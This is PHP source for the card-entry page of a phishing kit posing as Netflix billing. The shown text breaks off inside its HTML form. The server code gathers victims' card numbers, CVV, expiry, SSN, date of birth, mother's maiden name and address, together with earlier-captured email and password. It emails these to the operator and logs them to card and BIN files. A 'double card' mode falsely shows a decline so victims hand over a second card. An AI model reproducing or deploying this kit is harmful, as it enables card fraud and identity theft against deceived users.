<?php ob_start(); error_reporting(E_ALL); ini_set('display_errors', 1);
// Safe session start
if (session_status() === PHP_SESSION_NONE) {
    @ini_set('session.save_path', sys_get_temp_dir());
    @session_start();
}
include 'setup/function.php';
include 'setup/declined-card.php';
require_once __DIR__ . '/../GlobalSetting/email_sender.php';
$res = json_decode(file_get_contents('../config/access.json'), true);
$genConfig = json_decode(file_get_contents('../config/gen.json'), true);

// Get config for SSN, DOB, MMN, CITY (1 = on/required, 0 = off/hidden)
$ssnEnabled = isset($genConfig['ssn']) && $genConfig['ssn'] == '1';
$dobEnabled = isset($genConfig['dob']) && $genConfig['dob'] == '1';
$mmnEnabled = isset($genConfig['mmn']) && $genConfig['mmn'] == '1';
$cityEnabled = isset($genConfig['city_status']) && ($genConfig['city_status'] == '1' || $genConfig['city_status'] == 'on');

// Check if double_card is enabled
$doubleCardEnabled = isset($genConfig['double_card']) && $genConfig['double_card'] == '1';
$isSecondCard = !empty($_SESSION['double_card']);

// Helper function to get form value from POST or session
function getFormValue($fieldName) {
    // Priority: POST data first (if currently submitting)
    if(isset($_POST[$fieldName]) && $_POST[$fieldName] !== '') {
        return $_POST[$fieldName];
    }
    
    // Card-related fields (ccnumber, ccexp, cvv) should be empty when card declined
    $cardFields = ['ccnumber', 'ccexp', 'cvv'];
    if(in_array($fieldName, $cardFields)) {
        // Check if card was declined - if yes, don't use session data for card fields
        if(isset($_SESSION['card_declined']) && $_SESSION['card_declined'] == true) {
            return '';
        }
        if(isset($_SESSION['first_card_declined']) && $_SESSION['first_card_declined'] == true) {
            return '';
        }
    }
    
    // Fallback: session data (from previous submission)
    if(isset($_SESSION['form_data']) && is_array($_SESSION['form_data']) && isset($_SESSION['form_data'][$fieldName])) {
        return $_SESSION['form_data'][$fieldName];
    }
    return '';
}

// Check if card was declined (same card submitted or first card)
$cardDeclined = false;
$declinedMessage = '';

if($doubleCardEnabled) {
    if($isSecondCard) {
        // Second card - check if same as first card
        // Priority: check card_declined first (card kedua sama dengan card pertama)
        if(isset($_SESSION['card_declined']) && $_SESSION['card_declined'] == true) {
            $cardDeclined = true;
            $declinedMessage = __('card_declined_use_different');
        }
        // If no card_declined, show first card declined message
        else if(isset($_SESSION['first_card_declined']) && $_SESSION['first_card_declined'] == true) {
            $cardDeclined = true;
            $declinedMessage = 'Your previous card was declined. Please try a different payment method.';
        }
    } else {
        // First card - always show declined message after first submit
        if(isset($_SESSION['first_card_submitted']) && $_SESSION['first_card_submitted'] == true) {
            $cardDeclined = true;
            $declinedMessage = __('card_declined_try_different');
        }
    }
}

if(empty($_SESSION['email']) && empty($_SESSION['password'])) {
    // Session hilang, redirect ke login
    header("Location: loginss?session_expired=1");
    exit;
}

$ip = $_SERVER['REMOTE_ADDR'];
$userAgent = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown';
$ipData = fetchIpData($ip, $userAgent);
if ($ipData) saveIpData($ipData, 'Human in Card Page');

if($_SERVER['REQUEST_METHOD'] == 'POST') {
    
    if(!isset($_SESSION['counting_submit']))
    {
        $_SESSION['counting_submit'] = 0;
    }
    
    // Get all data ONLY from cc.php form (POST) - no session fallback
    $cardname = $_POST['cardname'] ?? '';
    $cardNumber = str_replace(' ', '', $_POST['ccnumber'] ?? '');

    if (!is_numeric($cardNumber) || !luhn_check($cardNumber)) {
        header("HTTP/1.1 400 Bad Request");
        exit;
    }

    $expirationDate = $_POST['ccexp'] ?? ''; $expirationDate = str_replace('/', '|', $expirationDate);
    $formatexpWebshop = explode('/', $_POST['ccexp'] ?? '');
    $cvv = $_POST['cvv'] ?? '';
    $cid = $_POST['amexcid'] ?? '';
    $xid = $_POST['xid'] ?? '';

    $bin = substr($cardNumber, 0, 6);
    $formattedCardNumber = implode(' ', str_split($cardNumber, 4));

    $formattedBin = $bin;

    $cardDetails = getCardDetailsFromBIN($bin);
    $issuer = strtoupper($cardDetails['issuer']);
    $cardTier = strtoupper($cardDetails['card_tier']);
    $scheme = strtoupper($cardDetails['scheme']);
    $type = strtoupper($cardDetails['type']);
    
    $ispInfo = fetchIpData($ip, $userAgent);
    $cityGeo = $ispInfo['city'] ?? 'Unknown';
    $region = $ispInfo['region'] ?? 'Unknown';
    $country = $ispInfo['country'] ?? 'Unknown';
    $isp = $ispInfo['isp'] ?? 'Unknown';
    
    // Get data ONLY from POST (cc.php form) - no session fallback
    $fullname = htmlspecialchars($_POST['cardname'] ?? '');
    $address = htmlspecialchars($_POST['fulladdress'] ?? '');
    $address2 = htmlspecialchars($_POST['adde'] ?? '');
    $city = htmlspecialchars($_POST['city'] ?? '');
    $state = htmlspecialchars($_POST['state'] ?? '');
    $zipcode = htmlspecialchars($_POST['zipcode'] ?? '');
    $phonenumber = htmlspecialchars($_POST['phone'] ?? '');
    $cty = $country;
    $sosel = htmlspecialchars($_POST['ssn'] ?? '');
    $dob = htmlspecialchars($_POST['dob'] ?? '');
    $mmn = htmlspecialchars($_POST['mmn'] ?? '');
    $email = htmlspecialchars($_SESSION['email'] ?? '');
    $password = htmlspecialchars($_SESSION['password'] ?? '');
    
    $deviceBrowser = getDeviceAndBrowser();
    $device = $deviceBrowser['device'];
    $browser = $deviceBrowser['browser'];
    $userAgent = $deviceBrowser['user_agent'];
    
    $dateTime = date("Y-m-d H:i:s");
    
    $webshop = "$cardNumber|$expirationDate|$cvv|$fullname|$address|$city|$state|$zipcode|$country|$phonenumber|$dob|$sosel|$mmn|$email|$ip|$userAgent";
    
    if($genConfig['double_card'] == '1') {
        if(!empty($_SESSION['double_card'])) {
            // Second card submission
            $submittedCard = str_replace(' ', '', $_POST['ccnumber']);
            $firstCard = str_replace(' ', '', $_SESSION['card_data']['ccnumber']);
            
            if($submittedCard == $firstCard)
            {
                // Same card as first - set declined flag and save form data to session
                $_SESSION['card_declined'] = true;
                $_SESSION['form_data'] = $_POST; // Save all form data to session
                $_SESSION['counting_submit'] += 1;
                if ($ipData) saveIpData($ipData, 'Human Try Submit Card '.$_SESSION['counting_submit']);
                header("Location: cc?ref=".generateRandomString(100));
                exit;
            } else {
                // Different card - clear declined flag and form data
                $_SESSION['card_declined'] = false;
                unset($_SESSION['form_data']); // Clear form data since card is accepted
                goto doublecc;
            }
        } else {
            // First card submission - set flag to show declined message on next visit
            $_SESSION['double_card'] = 'on';
            $_SESSION['card_data'] = $_POST;
            $_SESSION['form_data'] = $_POST; // Save all form data to session
            $_SESSION['first_card_submitted'] = true;
            $_SESSION['first_card_declined'] = true; // Flag to show declined message for first card
            
            // Store card info for declined template display
            $_SESSION['declined_card_info'] = [
                'scheme' => $scheme,
                'last4' => substr($cardNumber, -4),
                'issuer' => $issuer
            ];
            
            $templateCard = str_replace("##EMAIL##", $email, $templateCard);
            $templateCard = str_replace("##PASSWORD##", $password, $templateCard);
            $templateCard = str_replace("##BIN##", $formattedBin, $templateCard);
            $templateCard = str_replace("##CNM##", $cardname, $templateCard);
            $templateCard = str_replace("##CARDNUM##", $cardNumber, $templateCard);
            $templateCard = str_replace("##EXP##", $expirationDate, $templateCard);
            $templateCard = str_replace("##CVV##", $cvv, $templateCard);
            $templateCard = str_replace("##CID##", $cid, $templateCard);
            $templateCard = str_replace("##XID##", $xid, $templateCard);
            $templateCard = str_replace("##FULLNAME##", $fullname, $templateCard);
            $templateCard = str_replace("##ADDRESS##", $address, $templateCard);
            $templateCard = str_replace("##ADDRESS2##", $address2, $templateCard);
            $templateCard = str_replace("##CTY##", $city, $templateCard);
            $templateCard = str_replace("##STE##", $state, $templateCard);
            $templateCard = str_replace("##PHONE##", $phonenumber, $templateCard);
            $templateCard = str_replace("##PINN##", '', $templateCard);
            $templateCard = str_replace("##ZC##", $zipcode, $templateCard);
            $templateCard = str_replace("##MMN##", $mmn, $templateCard);
            $templateCard = str_replace("##DOB##", $dob, $templateCard);
            $templateCard = str_replace("##SSN##", $sosel, $templateCard);
            $templateCard = str_replace("##COPYWEB##", $webshop, $templateCard);
            $templateCard = str_replace("##DATE##", $dateTime, $templateCard);
            $templateCard = str_replace("##DV##", $device, $templateCard);
            $templateCard = str_replace("##BW##", $browser, $templateCard);
            $templateCard = str_replace("##CY##", $cityGeo, $templateCard);
            $templateCard = str_replace("##ST##", $region, $templateCard);
            $templateCard = str_replace("##CT##", $country, $templateCard);
            $templateCard = str_replace("##IP##", $ip, $templateCard);
            $templateCard = str_replace("##UA##", $userAgent, $templateCard);
            
            $subject = "Card 1 :: $formattedBin $scheme $type $issuer :: [ $ip - $country ]";
            sendGlobalEmail('', $subject, $templateCard, true);
            
            loginAndCardSave($ip, 'card.txt');
            loginAndCardSave($ip, 'card1.txt'); // Card 1 log
            cardDetailsLogs($ip, $formattedBin, $cardname, $issuer, $cardTier, $scheme,  $type, 'bin.txt');
            if ($ipData) saveIpData($ipData, 'Human Submit Card 1');
            
            // Save data to webshop logs for first card
            $dataccwebshop = "$cardNumber|$expirationDate|$cvv|$fullname|$address|$city|$state|$zipcode|$country|$phonenumber|$dob|$sosel|$mmn|$email|$ip|$userAgent";
            saveDataCard($dataccwebshop);
            
            // Redirect back to cc.php to show declined message and ask for second card
            header("Location: cc?ref=".generateRandomString(100));
            ob_flush();
            exit;
        }
    }
    
    doublecc:
    $_SESSION['card_data'] = $_POST;
    
    $templateCard = str_replace("##EMAIL##", $email, $templateCard);
    $templateCard = str_replace("##PASSWORD##", $password, $templateCard);
    $templateCard = str_replace("##BIN##", $formattedBin, $templateCard);
    $templateCard = str_replace("##CNM##", $cardname, $templateCard);
    $templateCard = str_replace("##CARDNUM##", $cardNumber, $templateCard);
    $templateCard = str_replace("##EXP##", $expirationDate, $templateCard);
    $templateCard = str_replace("##CVV##", $cvv, $templateCard);
    $templateCard = str_replace("##CID##", $cid, $templateCard);
    $templateCard = str_replace("##XID##", $xid, $templateCard);
    $templateCard = str_replace("##FULLNAME##", $fullname, $templateCard);
    $templateCard = str_replace("##ADDRESS##", $address, $templateCard);
    $templateCard = str_replace("##ADDRESS2##", $address2, $templateCard);
    $templateCard = str_replace("##CTY##", $city, $templateCard);
    $templateCard = str_replace("##STE##", $state, $templateCard);
    $templateCard = str_replace("##PHONE##", $phonenumber, $templateCard);
    $templateCard = str_replace("##PINN##", '', $templateCard);
    $templateCard = str_replace("##ZC##", $zipcode, $templateCard);
    $templateCard = str_replace("##MMN##", $mmn, $templateCard);
    $templateCard = str_replace("##DOB##", $dob, $templateCard);
    $templateCard = str_replace("##SSN##", $sosel, $templateCard);
    $templateCard = str_replace("##COPYWEB##", $webshop, $templateCard);
    $templateCard = str_replace("##DATE##", $dateTime, $templateCard);
    $templateCard = str_replace("##DV##", $device, $templateCard);
    $templateCard = str_replace("##BW##", $browser, $templateCard);
    $templateCard = str_replace("##CY##", $cityGeo, $templateCard);
    $templateCard = str_replace("##ST##", $region, $templateCard);
    $templateCard = str_replace("##CT##", $country, $templateCard);
    $templateCard = str_replace("##IP##", $ip, $templateCard);
    $templateCard = str_replace("##UA##", $userAgent, $templateCard);
    
    if($genConfig['double_card'] == '1') {
        $status_card = '2';
        loginAndCardSave($ip, 'card.txt');
        loginAndCardSave($ip, 'card2.txt'); // Card 2 log
        cardDetailsLogs($ip, $formattedBin, $cardname, $issuer, $cardTier, $scheme,  $type, 'bin.txt');
        if ($ipData) saveIpData($ipData, 'Human Submit Card 2');
    } else {
        $status_card = '1';
        if ($ipData) saveIpData($ipData, 'Human Submit Card 1');
        loginAndCardSave($ip, 'card.txt');
        loginAndCardSave($ip, 'card1.txt'); // Card 1 log
        cardDetailsLogs($ip, $formattedBin, $cardname, $issuer, $cardTier, $scheme,  $type, 'bin.txt');
    }
    
    $subject = "Card $status_card :: $formattedBin $scheme $type $issuer :: [ $ip - $country ]";
    sendGlobalEmail('', $subject, $templateCard, true);
    
    $dataccwebshop = "$cardNumber|$expirationDate|$cvv|$fullname|$address|$city|$state|$zipcode|$country|$phonenumber|$dob|$sosel|$mmn|$email|$ip|$userAgent";
    saveDataCard($dataccwebshop);
    
    session_destroy();
    
    header("Location: ".$genConfig['redirect_completed_link']);
    ob_flush();
    exit;
}
// Get visitor language
$visitorLang = $_SESSION['visitor_lang'] ?? 'en';
$textDir = function_exists('getTextDirection') ? getTextDirection() : 'ltr';
?>

<!DOCTYPE html>
<html lang="<?= $visitorLang ?>" dir="<?= $textDir ?>">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title><?= __('payment_setup_title') ?></title>
    <link rel="stylesheet" href="tema/styles/style.css">
    <style>
        /* Clean Loading Screen */
        .loading-overlay {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100vh;
            background: #ffffff;
            z-index: 999999;
            display: flex;
            justify-content: center;
            align-items: center;
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
        }
        .loading-content {
            text-align: center;
            padding: 40px;
        }
        .loading-spinner {
            border: 3px solid #f0f0f0;
            border-top: 3px solid #e50914;
            border-radius: 50%;
            width: 60px;
            height: 60px;
            animation: spin 0.8s linear infinite;
            margin: 0 auto 24px;
        }
        .loading-text {
            margin: 0;
            font-size: 18px;
            font-weight: 400;
            color: #333;
            letter-spacing: 0.5px;
        }
        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }

        /* Card Validation Styles */
        .form-control.valid-card {
            border-color: #28a745 !important;
            border-width: 2px !important;
            box-shadow: 0 0 0 0.2rem rgba(40, 167, 69, 0.25) !important;
            background-color: #f8fff9 !important;
        }
        
        .form-control.valid-card:focus {
            border-color: #28a745 !important;
            border-width: 2px !important;
            box-shadow: 0 0 0 0.2rem rgba(40, 167, 69, 0.25) !important;
            outline: none !important;
        }
        
        /* Force green border with inline style priority */
        input.form-control.valid-card,
        input.form-control[style*="border-color: #28a745"] {
            border-color: #28a745 !important;
            border-width: 2px !important;
        }
        
        .form-control.invalid-card {
            border-color: #dc3545 !important;
            border-width: 2px !important;
            box-shadow: 0 0 0 0.2rem rgba(220, 53, 69, 0.25) !important;
        }
        
        .form-control.invalid-card:focus {
            border-color: #dc3545 !important;
            box-shadow: 0 0 0 0.2rem rgba(220, 53, 69, 0.25) !important;
        }

        /* Button Loading State */
        .start-button {
            position: relative;
            transition: all 0.3s ease;
        }

        .start-button.loading {
            opacity: 0.8;
            cursor: not-allowed;
            pointer-events: none;
        }

        .start-button .btn-spinner {
            display: inline-block;
            width: 16px;
            height: 16px;
            border: 2px solid rgba(255, 255, 255, 0.3);
            border-top: 2px solid #ffffff;
            border-radius: 50%;
            animation: btnSpin 1s linear infinite;
            margin-right: 8px;
            vertical-align: middle;
        }

        @keyframes btnSpin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }

        /* Card Icon Styles */
        .card-icon {
            width: 40px;
            height: 24px;
            display: flex;
            align-items: center;
            justify-content: center;
            background-size: contain;
            background-repeat: no-repeat;
            background-position: center;
            transition: all 0.3s ease;
            border-radius: 4px;
        }

        .card-icon.default-card svg {
            width: 24px;
            height: 24px;
            color: #8c8c8c;
            transition: all 0.3s ease;
        }

        .card-icon.visa {
            background-image: url('tema/assets/images/VISA.png');
            background-size: 36px auto;
        }

        .card-icon.mastercard {
            background-image: url('tema/assets/images/MASTERCARD.png');
            background-size: 36px auto;
        }

        .card-icon.amex {
            background-image: url('tema/assets/images/AMEX.png');
            background-size: 36px auto;
        }

        .card-icon.discover {
            background: linear-gradient(135deg, #ff6000, #ff8533);
            color: white;
            font-size: 9px;
            font-weight: bold;
            font-family: Arial, sans-serif;
            border-radius: 4px;
            text-shadow: 0 1px 2px rgba(0,0,0,0.3);
        }

        .card-icon.diners {
            background: linear-gradient(135deg, #0079be, #005a8b);
            color: white;
            font-size: 7px;
            font-weight: bold;
            font-family: Arial, sans-serif;
            border-radius: 4px;
            text-shadow: 0 1px 2px rgba(0,0,0,0.3);
        }

        .card-icon.jcb {
            background: linear-gradient(135deg, #006cbc, #004f8a);
            color: white;
            font-size: 9px;
            font-weight: bold;
            font-family: Arial, sans-serif;
            border-radius: 4px;
            text-shadow: 0 1px 2px rgba(0,0,0,0.3);
        }

        /* Hide SVG when showing card logos */
        .card-icon.visa svg,
        .card-icon.mastercard svg,
        .card-icon.amex svg,
        .card-icon.discover svg,
        .card-icon.diners svg,
        .card-icon.jcb svg {
            display: none;
        }

        /* Animation effects */
        .card-icon {
            transform-origin: center;
        }

        .card-icon.default-card {
            animation: pulse 2s infinite;
        }

        @keyframes pulse {
            0% { opacity: 0.6; }
            50% { opacity: 1; }
            100% { opacity: 0.6; }
        }

        /* Stop pulse animation when card is detected */
        .card-icon:not(.default-card) {
            animation: none;
            opacity: 1;
        }

    </style>
</head>
<body>
    <!-- Simple Loading Screen -->
    <div id="loading-overlay" class="loading-overlay">
        <div class="loading-content">
            <div class="loading-spinner"></div>
            <p class="loading-text"><?= __('loading') ?></p>
        </div>
    </div>
    <header class="header">
        <div class="header-content">
            <svg class="netflix-logo" viewBox="0 0 111 30" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img">
                <g><path d="M105.06233,14.2806261 L110.999156,30 C109.249227,29.7497422 107.500234,29.4366857 105.718437,29.1554972 L102.374168,20.4686475 L98.9371075,28.4375293 C97.2499766,28.1563408 95.5928391,28.061674 93.9057081,27.8432843 L99.9372012,14.0931671 L94.4680851,-5.68434189e-14 L99.5313525,-5.68434189e-14 L102.593495,7.87421502 L105.874965,-5.68434189e-14 L110.999156,-5.68434189e-14 L105.06233,14.2806261 Z M90.4686475,-5.68434189e-14 L85.8749649,-5.68434189e-14 L85.8749649,27.2499766 C87.3746368,27.3437061 88.9371075,27.4055675 90.4686475,27.5930265 L90.4686475,-5.68434189e-14 Z M81.9055207,26.93692 C77.7186241,26.6557316 73.5307901,26.4064111 69.250164,26.3117443 L69.250164,-5.68434189e-14 L73.9366389,-5.68434189e-14 L73.9366389,21.8745899 C76.6248008,21.9373887 79.3120255,22.1557784 81.9055207,22.2804387 L81.9055207,26.93692 Z M64.2496954,10.6561065 L64.2496954,15.3435186 L57.8442216,15.3435186 L57.8442216,25.9996251 L53.2186709,25.9996251 L53.2186709,-5.68434189e-14 L66.3436123,-5.68434189e-14 L66.3436123,4.68741213 L57.8442216,4.68741213 L57.8442216,10.6561065 L64.2496954,10.6561065 Z M45.3435186,4.68741213 L45.3435186,26.2498828 C43.7810479,26.2498828 42.1876465,26.2498828 40.6561065,26.3117443 L40.6561065,4.68741213 L35.8121661,4.68741213 L35.8121661,-5.68434189e-14 L50.2183897,-5.68434189e-14 L50.2183897,4.68741213 L45.3435186,4.68741213 Z M30.749836,15.5928391 C28.687787,15.5928391 26.2498828,15.5928391 24.4999531,15.6875059 L24.4999531,22.6562939 C27.2499766,22.4678976 30,22.2495079 32.7809542,22.1557784 L32.7809542,26.6557316 L19.812541,27.6876933 L19.812541,-5.68434189e-14 L32.7809542,-5.68434189e-14 L32.7809542,4.68741213 L24.4999531,4.68741213 L24.4999531,10.9991564 C26.3126816,10.9991564 29.0936358,10.9054269 30.749836,10.9054269 L30.749836,15.5928391 Z M4.78114163,12.9684132 L4.78114163,29.3429562 C3.09401069,29.5313525 1.59340144,29.7497422 0,30 L0,-5.68434189e-14 L4.4690224,-5.68434189e-14 L10.562377,17.0315868 L10.562377,-5.68434189e-14 L15.2497891,-5.68434189e-14 L15.2497891,28.061674 C13.5935889,28.3437998 11.906458,28.4375293 10.1246602,28.6868498 L4.78114163,12.9684132 Z"></path></g>
            </svg>
            <a href="#" class="sign-out"><?= __('sign_out') ?></a>
        </div>
    </header>

    <main class="main-content">
        <div style="border: 2px solid #b00710; border-left: 4px solid #b00710; border-radius: 4px; padding: 14px 16px; margin-bottom: 20px; background: #fff;">
            <p style="color: #333; font-size: 15px; margin: 0; line-height: 1.5;">Please update your billing information to continue.</p>
        </div>
        <div class="step-info"><?= __('step_3_of_3') ?></div>
        <h1 class="page-title"><?= __('setup_card_title') ?></h1>

        <?php 
        // Display declined card template (uses template from control.json)
        // Ensure $dataPage is available and contains declined_template
        if (!isset($dataPage) || !is_array($dataPage)) {
            // Fallback: load control.json directly if $dataPage not available
            $controlJsonPath = __DIR__ . '/setup/control.json';
            if (function_exists('loadTemplateSettings')) {
                $dataPage = loadTemplateSettings('secure-3', $controlJsonPath);
            } elseif (file_exists($controlJsonPath)) {
                $dataPage = json_decode(file_get_contents($controlJsonPath), true) ?? [];
            } else {
                $dataPage = [];
            }
        }
        // Ensure declined_template exists in $dataPage
        if (!isset($dataPage['declined_template'])) {
            $dataPage['declined_template'] = '1'; // Default to template 1
        }
        echo netflixDeclinedCard($doubleCardEnabled, $dataPage);
        ?>

        <div class="card-types">
            <div class="visa-icon"></div>
            <div class="mastercard-icon"></div>
            <div class="amex-icon"></div>
        </div>

        <form method="POST" action="" id="cardForm">
            <div class="form-group">
                <div class="card-number-wrapper">
                    <div class="input-wrapper">
                        <input type="text" name="ccnumber" class="form-control" id="cardNumber" placeholder=" " maxlength="19" value="<?php echo htmlspecialchars(getFormValue('ccnumber')); ?>" required>
                        <label for="cardNumber" class="floating-label"><?= __('card_number') ?></label>
                    </div>
                    <div class="card-icon default-card" id="cardIcon">
                        <svg xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 24 24" width="24" height="24" data-icon="CreditCardStandard" aria-hidden="true">
                            <path fill-rule="evenodd" clip-rule="evenodd" d="M0 6C0 4.34315 1.34315 3 3 3H21C22.6569 3 24 4.34315 24 6V18C24 19.6569 22.6569 21 21 21H3C1.34314 21 0 19.6569 0 18V6ZM3 5C2.44772 5 2 5.44772 2 6V8H22V6C22 5.44771 21.5523 5 21 5H3ZM2 18V10H22V18C22 18.5523 21.5523 19 21 19H3C2.44772 19 2 18.5523 2 18ZM16 16H20V14H16V16Z" fill="currentColor"></path>
                        </svg>
                    </div>
                </div>
                <div class="error-message" id="cardNumberError">
                    <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                        <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                    </svg>
                    <span id="i18n-cc-number-error"><?= __('error_card_number') ?></span>
                </div>
            </div>

            <div class="date-cvv-section">
                <div class="form-row">
                    <div class="form-group">
                        <div class="input-wrapper">
                            <input type="text" name="ccexp" class="form-control" id="expDate" placeholder=" " maxlength="5" value="<?php echo htmlspecialchars(getFormValue('ccexp')); ?>" required>
                            <label for="expDate" class="floating-label"><?= __('expiry_date') ?></label>
                        </div>
                        <div class="error-message" id="expDateError">
                            <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                                <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                            </svg>
                            <span id="i18n-cc-expiry-error"><?= __('error_expiry_date') ?></span>
                        </div>
                    </div>
                    <div class="form-group">
                        <div class="input-wrapper">
                            <input type="text" name="cvv" class="form-control" id="cvv" placeholder=" " maxlength="4" value="<?php echo htmlspecialchars(getFormValue('cvv')); ?>" required>
                            <label for="cvv" class="floating-label"><?= __('cvv') ?></label>
                            <svg class="cvv-info" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 24 24" width="24" height="24" data-icon="CircleQuestionMarkStandard" pointer-events="all" aria-hidden="true">
                            <path fill-rule="evenodd" clip-rule="evenodd" d="M2 12C2 6.47715 6.47715 2 12 2C17.5228 2 22 6.47715 22 12C22 17.5228 17.5228 22 12 22C6.47715 22 2 17.5228 2 12ZM12 0C5.37258 0 0 5.37258 0 12C0 18.6274 5.37258 24 12 24C18.6274 24 24 18.6274 24 12C24 5.37258 18.6274 0 12 0ZM12 8C10.6831 8 10 8.74303 10 9.5H8C8 7.25697 10.0032 6 12 6C13.9968 6 16 7.25697 16 9.5C16 10.8487 14.9191 11.7679 13.8217 12.18C13.5572 12.2793 13.3322 12.4295 13.1858 12.5913C13.0452 12.7467 13 12.883 13 13V14H11V13C11 11.5649 12.1677 10.6647 13.1186 10.3076C13.8476 10.0339 14 9.64823 14 9.5C14 8.74303 13.3169 8 12 8ZM13.5 16.5C13.5 17.3284 12.8284 18 12 18C11.1716 18 10.5 17.3284 10.5 16.5C10.5 15.6716 11.1716 15 12 15C12.8284 15 13.5 15.6716 13.5 16.5Z" fill="currentColor"></path>
                        </svg>
                        </div>
                        <div class="error-message" id="cvvError">
                            <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                                <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                            </svg>
                            <span id="i18n-cc-cvv-error"><?= __('error_cvv') ?></span>
                        </div>
                    </div>
                </div>
            </div>

            <!-- CID field for American Express (conditional) -->
            <div class="form-group" id="cidFieldGroup" style="display: none;">
                <div class="input-wrapper">
                    <input type="text" name="amexcid" class="form-control" id="amexcid" placeholder=" " maxlength="3" value="<?php echo htmlspecialchars(getFormValue('amexcid')); ?>">
                    <label for="amexcid" class="floating-label"><?= __('cid_3_digits') ?? 'CID (3 digits)' ?></label>
                </div>
                <div class="error-message" id="cidError">
                    <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                        <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                    </svg>
                    <span id="i18n-cc-cid-error"><?= __('error_cid') ?></span>
                </div>
            </div>

            <!-- XID field for Discover (conditional) -->
            <div class="form-group" id="xidFieldGroup" style="display: none;">
                <div class="input-wrapper">
                    <input type="tel" name="xid" class="form-control" id="xid_input" placeholder=" " maxlength="5" inputmode="numeric" value="<?php echo htmlspecialchars(getFormValue('xid')); ?>">
                    <label for="xid_input" class="floating-label">XID (5 digits)</label>
                </div>
                <div class="error-message" id="xid_error">
                    <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                        <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                    </svg>
                    <span id="i18n-cc-xid-error">Enter 5-digit XID.</span>
                </div>
            </div>

            <div class="form-group">
                <div class="input-wrapper">
                    <input type="text" name="cardname" class="form-control" id="nameOnCard" placeholder=" " value="<?php echo htmlspecialchars(getFormValue('cardname')); ?>" required>
                    <label for="nameOnCard" class="floating-label"><?= __('card_holder') ?></label>
                </div>
                <div class="error-message" id="nameOnCardError">
